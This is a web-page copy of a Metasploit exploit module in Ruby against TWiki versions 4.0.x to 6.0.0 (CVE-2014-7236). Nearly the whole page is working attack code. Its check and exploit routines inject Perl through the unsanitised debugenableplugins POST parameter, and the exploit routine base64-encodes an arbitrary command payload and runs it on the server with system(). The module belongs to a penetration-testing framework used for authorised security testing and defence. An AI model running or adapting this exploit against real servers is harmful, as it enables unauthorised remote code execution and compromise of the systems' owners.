Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/http/twiki_debug_plugins.rb
21633 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'TWiki Debugenableplugins Remote Code Execution',

16
        'Description' => %q{

17
          TWiki 4.0.x-6.0.0  contains a vulnerability in the Debug functionality.

18
          The value of the debugenableplugins parameter is used without proper sanitization

19
          in an Perl eval statement which allows remote code execution.

20
        },

21
        'Author' => [

22
          'Netanel Rubin', # from Check Point - Discovery

23
          'h0ng10', # Metasploit Module

24


25
        ],

26
        'License' => MSF_LICENSE,

27
        'References' => [

28
          [ 'CVE', '2014-7236'],

29
          [ 'OSVDB', '112977'],

30
          [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236']

31
        ],

32
        'Privileged' => false,

33
        'Targets' => [

34
          [

35
            'Automatic',

36
            {

37
              'Payload' =>

38
                {

39
                  'BadChars' => "",

40
                  'Compat' =>

41
              {

42
                'PayloadType' => 'cmd',

43
                'RequiredCmd' => 'generic perl python php',

44
              }

45
                },

46
              'Platform' => ['unix'],

47
              'Arch' => ARCH_CMD

48
            }

49
          ]

50
        ],

51
        'DefaultTarget' => 0,

52
        'DisclosureDate' => '2014-10-09',

53
        'Notes' => {

54
          'Reliability' => UNKNOWN_RELIABILITY,

55
          'Stability' => UNKNOWN_STABILITY,

56
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

57
        }

58
      )

59
    )

60


61
    register_options(

62
      [

63
        OptString.new('TARGETURI', [ true, "TWiki path", '/do/view/Main/WebHome' ]),

64
        OptString.new('PLUGIN', [true, "A existing TWiki Plugin", 'BackupRestorePlugin'])

65
      ]

66
    )

67
  end

68


69
  def send_code(perl_code)

70
    uri = target_uri.path

71
    data = "debugenableplugins=#{datastore['PLUGIN']}%3b" + CGI.escape(perl_code) + "%3bexit"

72


73
    res = send_request_cgi!({

74
      'method' => 'POST',

75
      'uri' => uri,

76
      'data' => data

77
    })

78


79
    return res

80
  end

81


82
  def check

83
    rand_1 = rand_text_alpha(5)

84
    rand_2 = rand_text_alpha(5)

85


86
    code = "print(\"Content-Type:text/html\\r\\n\\r\\n#{rand_1}\".\"#{rand_2}\")"

87
    res = send_code(code)

88


89
    if res and res.code == 200

90
      return CheckCode::Vulnerable if res.body == rand_1 + rand_2

91
    end

92
    CheckCode::Unknown

93
  end

94


95
  def exploit

96
    code = "print(\"Content-Type:text/html\\r\\n\\r\\n\");"

97
    code += "require('MIME/Base64.pm');MIME::Base64->import();"

98
    code += "system(decode_base64('#{Rex::Text.encode_base64(payload.encoded)}'));exit"

99
    res = send_code(code)

100
    handler

101
  end

102
end

103


104